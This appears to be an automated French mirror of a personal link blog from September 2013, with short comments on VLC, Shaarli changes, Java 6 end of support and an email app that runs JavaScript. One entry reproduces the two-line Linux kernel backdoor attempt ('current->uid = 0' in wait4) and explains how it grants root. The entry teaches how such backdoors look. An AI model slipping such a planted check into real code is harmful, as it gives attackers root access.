sebsauvage.net

Ce site n'est pas le site officiel.
C'est un blog automatisé qui réplique les articles automatiquement

Annuaire de Shaarlis

Thursday 26 September 2013 at 09:45

Oui, il n'y a toujours pas d'annuaire de Shaarlis. Il faudrait y réfléchir.
(Permalink)

Source: http://gilles.wittezaele.fr/paste/?ddd3e93511c383a9#NV/SqqjXIfzY03rVmOe5cn0/AFPqTmrR9Q11u93WsCA=


VideoLAN - VLC 2.1 Rincewind

Thursday 26 September 2013 at 09:15

Nouvelle grosse version de VLC.  Notre fidèle VLC.
(Permalink)

Source: http://www.videolan.org/vlc/releases/2.1.0.html


Jackie Chan just posted this on his Facebook - Imgur

Wednesday 25 September 2013 at 23:29

Haha ! Trop bon... Jackie Chan a posté ceci sur sa page Facebook: Il vient de découvrir qu'il est un mème.  :-D
(https://www.facebook.com/photo.php?fbid=10151946646137318&set=a.98876792317.90092.30382852317&type=1)
(Permalink)

Source: http://imgur.com/WH5pwfZ


hypocentre -short film- in Vimeo Staff Picks on Vimeo

Wednesday 25 September 2013 at 22:39

Imaginez Paris... totalement vidé de ses habitants.   Un peu flippant.
(Permalink)

Source: http://vimeo.com/74857458


[Shaarli] Quelques modifications

Wednesday 25 September 2013 at 21:56

Bon, après les QR-Code qui n'utilisent plus ni jQuery, ni un service externe, j'ai également viré jQuery de la quasi-totalité des pages. (jQuery n'est désormais inclus que dans les pages qui en ont vraiment besoin. Et pour ces pages, il sera dégagé plus tard en réimplémentant les autocompletes et autres).
Gain immédiat: 289 kilo-octets en moins par page !   \o/

Pour mettre à jour, récupérer la dernière version (https://github.com/sebsauvage/Shaarli/archive/master.zip). Supprimez tout sauf votre répertoire "data" et dézippez cette version.
(Permalink)

Source: https://github.com/sebsauvage/Shaarli?date=20130925


Mailbox App for iOS Automatically Executes Javascript | Threatpost

Wednesday 25 September 2013 at 20:18

Quel espèce de crétin développe une application de mail qui exécute automatiquement tout javascript inclus dans les mails reçus ?  SÉRIEUSEMENT ???  ><
EDIT: Voir aussi http://nakedsecurity.sophos.com/2013/09/26/mailbox-app-on-ipads-and-iphones-runs-javascript-from-emails-vulnerability-or-feature/
(Permalink)

Source: http://threatpost.com/javascript-issue-plagues-mailbox-app-for-ios/102406


An attempt to backdoor the kernel [LWN.net]

Wednesday 25 September 2013 at 17:16

Ça ressemble à quoi une backdoor dans un Kernel linux ?
C'est aussi simple que remplacer "==" par "=" comme cela a été fait dans ces deux lignes de code:
      if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
                      retval = -EINVAL;

Ce qui ressemblait à l'origine à un contrôle de droits ("L'utilisateur est-il bien root ?") devient "On DONNE les droits root".
Donc n'importe qui qui aurait appelé cette fonction système wait4() avec ces deux flags actifs aurait obtenu l'accès root.

Un seul caractère supprimé, et voilà une backdoor pour obtenir l'accès root sur un système.  Devil is in the details.
(Permalink)

Source: http://lwn.net/Articles/57135/


End of support for Java SE 6 - Microsoft Malware Protection Center - Site Home - TechNet Blogs

Wednesday 25 September 2013 at 16:19

Juste un rappel: Java 6 n'est plus supporté par Oracle depuis février 2013. Ce qui veut dire plus de mises à jour de sécurité.
Même si vous avez installé Java 7, Java 6 n'est pas automatiquement supprimé. Pensez bien à le déinstaller.
(Permalink)

Source: https://blogs.technet.com/b/mmpc/archive/2013/09/24/end-of-support-for-java-se-6.aspx?Redirected=true


Just 2 minutes | CommitStrip - Blog relating the daily life of web agencies developers

Wednesday 25 September 2013 at 15:59

C'est exactement ça. Y'a des moments des modifs qui devraient être simples deviennent un vrai parcours du combattant.
(Permalink)

Source: http://www.commitstrip.com/fr/2013/09/24/yen-a-pour-2-minutes/


Chargement dynamique de librairie Javascript (à la demande)

Wednesday 25 September 2013 at 15:30

Voici un exemple minimaliste de création d'un QR-Code avec une lib javascript (http://neocotic.com/qr.js). Cliquez le bouton, ça génère un QR-Code.
Rien d'extraordinaire, mais c'est codé de manière à ce que la lib ne soit chargée dans la page *que* si le bouton est cliqué.

J'ai fait la même chose dans Shaarli: Cette lib est désormais utilisée pour générer le QR-Code au lieu de faire appel à un service externe (c'est mieux pour la protection de la vie privée.)
Mais en utilisant cette petite bidouille, on évite totalement de charger la lib dans chaque page. Elle n'est chargée que si on en a besoin.
Certes c'est une petite économie (11 ko), mais c'est toujours ça de gagné.
(oui promis je vais faire de mon mieux pour virer jQuery de Shaarli.)
(cf. commit https://github.com/sebsauvage/Shaarli/commit/af77b2fd9a574ba03b309ea0799946fabf37c7d1)

J'imagine qu'on doit pouvoir rendre ça plus générique, mais franchement le javascript me gave...
(Permalink)

Source: http://sebsauvage.net/paste/?61de6babdaaee5e0#SKfFj38Pzqq678hHs7mlwlVcGn7GMEUTtftHqAAiJ80=